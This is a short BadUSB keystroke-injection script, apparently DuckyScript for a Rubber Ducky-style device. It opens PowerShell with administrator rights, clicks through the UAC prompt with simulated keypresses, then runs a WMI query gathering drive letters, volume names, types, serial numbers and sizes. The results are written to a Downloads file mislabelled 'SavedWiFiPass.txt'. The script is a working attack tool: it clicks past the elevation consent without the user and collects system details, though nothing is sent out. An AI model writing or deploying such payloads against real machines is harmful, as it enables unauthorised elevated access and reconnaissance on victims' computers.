
GUI r
DELAY 500
STRING powershell
CTRL+SHIFT+ENTER
DELAY 2000
LEFTARROW
DELAY 1000
ENTER
DELAY 500
STRING $driveType = @{ 
ENTER
STRING 2="Removable disk " 
ENTER
STRING 3="Local disk " 
ENTER
STRING 4="Network disk " 
ENTER
STRING 5="Compact disk "} 
ENTER
STRING $Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType"; Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB"; Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB"; Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent"; Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; } >> $env:USERPROFILE\Downloads\SavedWiFiPass.txt
ENTER
STRING exit
ENTER